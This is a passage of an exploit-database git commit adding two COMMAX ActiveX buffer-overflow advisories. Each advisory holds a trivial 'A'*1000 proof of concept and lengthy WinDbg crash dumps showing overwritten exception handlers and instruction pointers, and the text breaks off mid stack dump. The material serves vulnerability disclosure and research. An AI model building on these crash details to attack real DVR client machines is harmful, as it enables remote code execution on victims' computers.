From ac4322c402cdd33966a45ed97667c4b537cabe6c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 28 Aug 2021 05:01:59 +0000 Subject: [PATCH] DB: 2021-08-28 3 changes to exploits/shellcodes CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow --- exploits/hardware/webapps/50231.txt | 332 +++++++++++++++++ exploits/hardware/webapps/50232.txt | 551 ++++++++++++++++++++++++++++ exploits/multiple/webapps/50230.py | 203 ++++++++++ files_exploits.csv | 3 + 4 files changed, 1089 insertions(+) create mode 100644 exploits/hardware/webapps/50231.txt create mode 100644 exploits/hardware/webapps/50232.txt create mode 100755 exploits/multiple/webapps/50230.py diff --git a/exploits/hardware/webapps/50231.txt b/exploits/hardware/webapps/50231.txt new file mode 100644 index 000000000..90e50c4c7 --- /dev/null +++ b/exploits/hardware/webapps/50231.txt @@ -0,0 +1,332 @@ +# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow +# Date: 02.08.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.commax.com + +COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow + + +Vendor: COMMAX Co., Ltd. +Prodcut web page: https://www.commax.com +Affected version: 2.1.4.5 + +Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. + +Desc: The vulnerability is caused due to a boundary error in the +processing of user input, which can be exploited to cause a buffer +overflow when a user inserts overly long array of string bytes +through several functions. Successful exploitation could allow +execution of arbitrary code on the affected node. + +Tested on: Microsoft Windows 10 Home (64bit) EN + Microsoft Internet Explorer 20H2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5663 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php + + +02.08.2021 + +-- + + +$ python +>>> "A"*1000 [ToTheClipboard] +>>>#Paste in ID or anywhere + +(5220.5b30): Access violation - code c0000005 (!!! second chance !!!) +wow64!Wow64pNotifyDebugger+0x19918: +00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00 +0:038> g +(5220.5b30): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - +CNC_Ctrl!DllUnregisterServer+0xf5501: +0b4d43bf f3aa rep stos byte ptr es:[edi] +0:038:x86> r +eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 +eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +CNC_Ctrl!DllUnregisterServer+0xf5501: +0b4d43bf f3aa rep stos byte ptr es:[edi] +0:038:x86> !exchain +0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) +0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) + CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806) + func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f) +0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29) +Invalid exception stack at ffffffff +0:038:x86> kb + # ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 +01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c +02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 +03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 +0:038:x86> d esp +0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~. +0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... +0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... +0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... +0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... +0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v +0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v +0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... +0:038:x86> d ebp +0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... +0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... +0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... +0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... +0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v +0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v +0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... +0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................ +0:038:x86> d esi +41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? +0:038:x86> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX - +GetUrlPageData2 (WinHttp) failed: 12002. + +DUMP_CLASS: 2 + +DUMP_QUALIFIER: 0 + +FAULTING_IP: +CNC_Ctrl!DllUnregisterServer+f5501 +0b4d43bf f3aa rep stos byte ptr es:[edi] + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000001 + Parameter[1]: 41414141 +Attempt to write to address 41414141 + +FAULTING_THREAD: 00005b30 + +DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE + +PROCESS_NAME: IEXPLORE.EXE + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR: c0000005 + +EXCEPTION_PARAMETER1: 00000001 + +EXCEPTION_PARAMETER2: 41414141 + +FOLLOWUP_IP: +CNC_Ctrl!DllUnregisterServer+f5501 +0b4d43bf f3aa rep stos byte ptr es:[edi] + +WRITE_ADDRESS: 41414141 + +WATSON_BKT_PROCSTAMP: 95286d96 + +WATSON_BKT_PROCVER: 11.0.19041.1 + +PROCESS_VER_PRODUCT: Internet Explorer + +WATSON_BKT_MODULE: CNC_Ctrl.DLL + +WATSON_BKT_MODSTAMP: 547ed821 + +WATSON_BKT_MODOFFSET: 1043bf + +WATSON_BKT_MODVER: 1.7.0.2 + +MODULE_VER_PRODUCT: CNC_Ctrl Module + +BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) + +MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e + +MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9 + +NTGLOBALFLAG: 0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +PRODUCT_TYPE: 1 + +SUITE_MASK: 784 + +DUMP_TYPE: fe + +ANALYSIS_SESSION_HOST: LAB17 + +ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116 + +ANALYSIS_VERSION: 10.0.16299.91 amd64fre + +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n301] + Type: [@ACCESS_VIOLATION] + Class: Addendum + Scope: BUCKET_ID + Name: Omit + Data: Omit + PID: [Unspecified] + TID: [0x5b30] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n274] + Type: [INVALID_POINTER_WRITE] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [0x5b30] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n152] + Type: [ZEROED_STACK] + Class: Addendum + Scope: BUCKET_ID + Name: Add + Data: Omit + PID: [0x5220] + TID: [0x5b30] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + +BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK + +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT + +LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 +0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c +0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 +0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 + + +THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7 + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546 + +THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5 + +FAULT_INSTR_CODE: 458baaf3 + +SYMBOL_STACK_INDEX: 0 + +SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: CNC_Ctrl + +IMAGE_NAME: CNC_Ctrl.DLL + +DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 + +STACK_COMMAND: ~38s ; .cxr ; kb + +FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer + +BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501 + +FAILURE_EXCEPTION_CODE: c0000005 + +FAILURE_IMAGE_NAME: CNC_Ctrl.DLL + +BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL + +FAILURE_MODULE_NAME: CNC_Ctrl + +BUCKET_ID_MODULE_STR: CNC_Ctrl + +FAILURE_FUNCTION_NAME: DllUnregisterServer + +BUCKET_ID_FUNCTION_STR: DllUnregisterServer + +BUCKET_ID_OFFSET: f5501 + +BUCKET_ID_MODTIMEDATESTAMP: 547ed821 + +BUCKET_ID_MODCHECKSUM: 357a4b + +BUCKET_ID_MODVER_STR: 1.7.0.2 + +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ + +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT + +FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer + +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1 + +TARGET_TIME: 2021-08-12T12:21:50.000Z + +OSBUILD: 19042 + +OSSERVICEPACK: 1023 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt SingleUserTS Personal + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: unknown_date + +BUILDDATESTAMP_STR: 160101.0800 + +BUILDLAB_STR: WinBuild + +BUILDOSVER_STR: 10.0.19041.1023 + +ANALYSIS_SESSION_ELAPSED_TIME: 1d869 + +ANALYSIS_SOURCE: UM + +FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver + +FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} + +Followup: MachineOwner +--------- \ No newline at end of file diff --git a/exploits/hardware/webapps/50232.txt b/exploits/hardware/webapps/50232.txt new file mode 100644 index 000000000..de6ee4b5a --- /dev/null +++ b/exploits/hardware/webapps/50232.txt @@ -0,0 +1,551 @@ +# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow +# Date: 02.08.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.commax.com + +COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow + + +Vendor: COMMAX Co., Ltd. +Prodcut web page: https://www.commax.com +Affected version: 1.7.0.2 + +Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX +DVR/NVR. + +Desc: The vulnerability is caused due to a boundary error in the +processing of user input, which can be exploited to cause a heap +based buffer overflow when a user inserts overly long array of +string bytes through several functions. Successful exploitation +could allow execution of arbitrary code on the affected node. + +Tested on: Microsoft Windows 10 Home (64bit) EN + Microsoft Internet Explorer 20H2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5664 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php + + +02.08.2021 + +-- + + + + + + + + + +== + +(5b1c.59e8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - +CNC_Ctrl!DllUnregisterServer+0x19e34: +10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? +0:000:x86> r +eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001 +eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +CNC_Ctrl!DllUnregisterServer+0x19e34: +10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? +0:000:x86> !exchain +030feab4: 41414141 +Invalid exception stack at 41414141 +0:000:x86> d esp +030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0:000:x86> d ebp +030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +0:000:x86> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +GetUrlPageData2 (WinHttp) failed: 12002. + +DUMP_CLASS: 2 + +DUMP_QUALIFIER: 0 + +FAULTING_IP: +CNC_Ctrl!DllUnregisterServer+18ee3 +10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000001 + Parameter[1]: 000012d4 +Attempt to write to address 000012d4 + +FAULTING_THREAD: 000056a4 + +DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE + +PROCESS_NAME: wscript.exe + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR: c0000005 + +EXCEPTION_PARAMETER1: 00000001 + +EXCEPTION_PARAMETER2: 000012d4 + +FOLLOWUP_IP: +CNC_Ctrl!DllUnregisterServer+18ee3 +10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx + +WRITE_ADDRESS: 000012d4 + +WATSON_BKT_PROCSTAMP: 7159f3df + +WATSON_BKT_PROCVER: 5.812.10240.16384 + +PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host + +WATSON_BKT_MODULE: CNC_Ctrl.DLL + +WATSON_BKT_MODSTAMP: 547ed821 + +WATSON_BKT_MODOFFSET: 27da1 + +WATSON_BKT_MODVER: 1.7.0.2 + +MODULE_VER_PRODUCT: CNC_Ctrl Module + +BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) + +MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e + +MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1 + +NTGLOBALFLAG: 0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +PRODUCT_TYPE: 1 + +SUITE_MASK: 784 + +DUMP_TYPE: fe + +ANALYSIS_SESSION_HOST: LAB17 + +ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907 + +ANALYSIS_VERSION: 10.0.16299.91 amd64fre + +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n301] + Type: [@ACCESS_VIOLATION] + Class: Addendum + Scope: BUCKET_ID + Name: Omit + Data: Omit + PID: [Unspecified] + TID: [0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n274] + Type: [INVALID_POINTER_WRITE] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + + ID: [0n152] + Type: [ZEROED_STACK] + Class: Addendum + Scope: BUCKET_ID + Name: Add + Data: Omit + PID: [0x56e4] + TID: [0x56a4] + Frame: [0] : CNC_Ctrl!DllUnregisterServer + +BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK + +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT + +IP_ON_HEAP: 61616161 +The fault address in not in any loaded module, please check your build's rebase +log at \bin\build_logs\timebuild\ntrebase.log for module which may +contain the address if it were loaded. + +IP_IN_FREE_BLOCK: 61616161 + +FRAME_ONE_INVALID: 1 + +LAST_CONTROL_TRANSFER: from 61616161 to 10027da1 + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3 +00afe298 61616161 61616161 61616161 61616161 0x61616161 +00afe29c 61616161 61616161 61616161 61616161 0x61616161 +00afe2a0 61616161 61616161 61616161 61616161 0x61616161 +00afe2a4 61616161 61616161 61616161 61616161 0x61616161 +00afe2a8 61616161 61616161 61616161 61616161 0x61616161 +00afe2ac 61616161 61616161 61616161 61616161 0x61616161 +00afe2b0 61616161 61616161 61616161 61616161 0x61616161 +00afe2b4 61616161 61616161 61616161 61616161 0x61616161 +00afe2b8 61616161 61616161 61616161 61616161 0x61616161 +00afe2bc 61616161 61616161 61616161 61616161 0x61616161 +00afe2c0 61616161 61616161 61616161 61616161 0x61616161 +00afe2c4 61616161 61616161 61616161 61616161 0x61616161 +00afe2c8 61616161 61616161 61616161 61616161 0x61616161 +00afe2cc 61616161 61616161 61616161 61616161 0x61616161 +00afe2d0 61616161 61616161 61616161 61616161 0x61616161 +00afe2d4 61616161 61616161 61616161 61616161 0x61616161 +00afe2d8 61616161 61616161 61616161 61616161 0x61616161 +00afe2dc 61616161 61616161 61616161 61616161 0x61616161 +00afe2e0 61616161 61616161 61616161 61616161 0x61616161 +00afe2e4 61616161 61616161 61616161 61616161 0x61616161 +00afe2e8 61616161 61616161 61616161 61616161 0x61616161 +00afe2ec 61616161 61616161 61616161 61616161 0x61616161 +00afe2f0 61616161 61616161 61616161 61616161 0x61616161 +00afe2f4 61616161 61616161 61616161 61616161 0x61616161 +00afe2f8 61616161 61616161 61616161 61616161 0x61616161 +00afe2fc 61616161 61616161 61616161 61616161 0x61616161 +00afe300 61616161 61616161 61616161 61616161 0x61616161 +00afe304 61616161 61616161 61616161 61616161 0x61616161 +00afe308 61616161 61616161 61616161 61616161 0x61616161 +00afe30c 61616161 61616161 61616161 61616161 0x61616161 +00afe310 61616161 61616161 61616161 61616161 0x61616161 +00afe314 61616161 61616161 61616161 61616161 0x61616161 +00afe318 61616161 61616161 61616161 41414141 0x61616161 +00afe31c 61616161 61616161 41414141 41414141 0x61616161 +00afe320 61616161 41414141 41414141 41414141 0x61616161 +00afe324 41414141 41414141 41414141 41414141 0x61616161 +00afe328 41414141 41414141 41414141 41414141 0x41414141 +00afe32c 41414141 41414141 41414141 41414141 0x41414141 +00afe330 41414141 41414141 41414141 41414141 0x41414141 +00afe334 41414141 41414141 41414141 41414141 0x41414141 +00afe338 41414141 41414141 41414141 41414141 0x41414141 +00afe33c 41414141 41414141 41414141 41414141 0x41414141 +00afe340 41414141 41414141 41414141 41414141 0x41414141 +00afe344 41414141 41414141 41414141 41414141 0x41414141 +00afe348 41414141 41414141 41414141 41414141 0x41414141 +00afe34c 41414141 41414141 41414141 41414141 0x41414141 +00afe350 41414141 41414141 41414141 41414141 0x41414141 +00afe354 41414141 41414141 41414141 41414141 0x41414141 +00afe358 41414141 41414141 41414141 41414141 0x41414141 +00afe35c 41414141 41414141 41414141 41414141 0x41414141 +00afe360 41414141 41414141 41414141 41414141 0x41414141 +00afe364 41414141 41414141 41414141 41414141 0x41414141 +00afe368 41414141 41414141 41414141 41414141 0x41414141 +00afe36c 41414141 41414141 41414141 41414141 0x41414141 +00afe370 41414141 41414141 41414141 41414141 0x41414141 +00afe374 41414141 41414141 41414141 41414141 0x41414141 +00afe378 41414141 41414141 41414141 41414141 0x41414141 +00afe37c 41414141 41414141 41414141 41414141 0x41414141 +00afe380 41414141 41414141 41414141 41414141 0x41414141 +00afe384 41414141 41414141 41414141 41414141 0x41414141 +00afe388 41414141 41414141 41414141 41414141 0x41414141 +00afe38c 41414141 41414141 41414141 41414141 0x41414141 +00afe390 41414141 41414141 41414141 41414141 0x41414141 +00afe394 41414141 41414141 41414141 41414141 0x41414141 +00afe398 41414141 41414141 41414141 41414141 0x41414141 +00afe39c 41414141 41414141 41414141 41414141 0x41414141 +00afe3a0 41414141 41414141 41414141 41414141 0x41414141 +00afe3a4 41414141 41414141 41414141 41414141 0x41414141 +00afe3a8 41414141 41414141 41414141 41414141 0x41414141 +00afe3ac 41414141 41414141 41414141 41414141 0x41414141 +00afe3b0 41414141 41414141 41414141 41414141 0x41414141 +00afe3b4 41414141 41414141 41414141 41414141 0x41414141 +00afe3b8 41414141 41414141 41414141 41414141 0x41414141 +00afe3bc 41414141 41414141 41414141 41414141 0x41414141 +00afe3c0 41414141 41414141 41414141 41414141 0x41414141 +00afe3c4 41414141 41414141 41414141 41414141 0x41414141 +00afe3c8 41414141 41414141 41414141 41414141 0x41414141 +00afe3cc 41414141 41414141 41414141 41414141 0x41414141 +00afe3d0 41414141 41414141 41414141 41414141 0x41414141 +00afe3d4 41414141 41414141 41414141 41414141 0x41414141 +00afe3d8 41414141 41414141 41414141 41414141 0x41414141 +00afe3dc 41414141 41414141 41414141 41414141 0x41414141 +00afe3e0 41414141 41414141 41414141 41414141 0x41414141 +00afe3e4 41414141 41414141 41414141 41414141 0x41414141 +00afe3e8 41414141 41414141 41414141 41414141 0x41414141 +00afe3ec 41414141 41414141 41414141 41414141 0x41414141 +00afe3f0 41414141 41414141 41414141 41414141 0x41414141 +00afe3f4 41414141 41414141 41414141 41414141 0x41414141 +00afe3f8 41414141 41414141 41414141 41414141 0x41414141 +00afe3fc 41414141 41414141 41414141 41414141 0x41414141 +00afe400 41414141 41414141 41414141 41414141 0x41414141 +00afe404 41414141 41414141 41414141 41414141 0x41414141 +00afe408 41414141 41414141 41414141 41414141 0x41414141 +00afe40c 41414141 41414141 41414141 41414141 0x41414141 +00afe410 41414141 41414141 41414141 41414141 0x41414141 +00afe414 41414141 41414141 41414141 41414141 0x41414141 +00afe418 41414141 41414141 41414141 41414141 0x41414141 +00afe41c 41414141 41414141 41414141 41414141 0x41414141 +00afe420 41414141 41414141 41414141 41414141 0x41414141 +00afe424 41414141 41414141 41414141 41414141 0x41414141 +00afe428 41414141 41414141 41414141 41414141 0x41414141 +00afe42c 41414141 41414141 41414141 41414141 0x41414141 +00afe430 41414141 41414141 41414141 41414141 0x41414141 +00afe434 41414141 41414141 41414141 41414141 0x41414141 +00afe438 41414141 41414141 41414141 41414141 0x41414141 +00afe43c 41414141 41414141 41414141 41414141 0x41414141 +00afe440 41414141 41414141 41414141 41414141 0x41414141 +00afe444 41414141 41414141 41414141 41414141 0x41414141 +00afe448 41414141 41414141 41414141 41414141 0x41414141 +00afe44c 41414141 41414141 41414141 41414141 0x41414141 +00afe450 41414141 41414141 41414141 41414141 0x41414141 +00afe454 41414141 41414141 41414141 41414141 0x41414141 +00afe458 41414141 41414141 41414141 41414141 0x41414141 +00afe45c 41414141 41414141 41414141 41414141 0x41414141 +00afe460 41414141 41414141 41414141 41414141 0x41414141 +00afe464 41414141 41414141 41414141 41414141 0x41414141 +00afe468 41414141 41414141 41414141 41414141 0x41414141 +00afe46c 41414141 41414141 41414141 41414141 0x41414141 +00afe470 41414141 41414141 41414141 41414141 0x41414141 +00afe474 41414141 41414141 41414141 41414141 0x41414141 +00afe478 41414141 41414141 41414141 41414141 0x41414141 +00afe47c 41414141 41414141 41414141 41414141 0x41414141 +00afe480 41414141 41414141 41414141 41414141 0x41414141 +00afe484 41414141 41414141 41414141 41414141 0x41414141 +00afe488 41414141 41414141 41414141 41414141 0x41414141 +00afe48c 41414141 41414141 41414141 41414141 0x41414141 +00afe490 41414141 41414141 41414141 41414141 0x41414141 +00afe494 41414141 41414141 41414141 41414141 0x41414141 +00afe498 41414141 41414141 41414141 41414141 0x41414141 +00afe49c 41414141 41414141 41414141 41414141 0x41414141 +00afe4a0 41414141 41414141 41414141 41414141 0x41414141 +00afe4a4 41414141 41414141 41414141 41414141 0x41414141 +00afe4a8 41414141 41414141 41414141 41414141 0x41414141 +00afe4ac 41414141 41414141 41414141 41414141 0x41414141 +00afe4b0 41414141 41414141 41414141 41414141 0x41414141 +00afe4b4 41414141 41414141 41414141 41414141 0x41414141 +00afe4b8 41414141 41414141 41414141 41414141 0x41414141 +00afe4bc 41414141 41414141 41414141 41414141 0x41414141 +00afe4c0 41414141 41414141 41414141 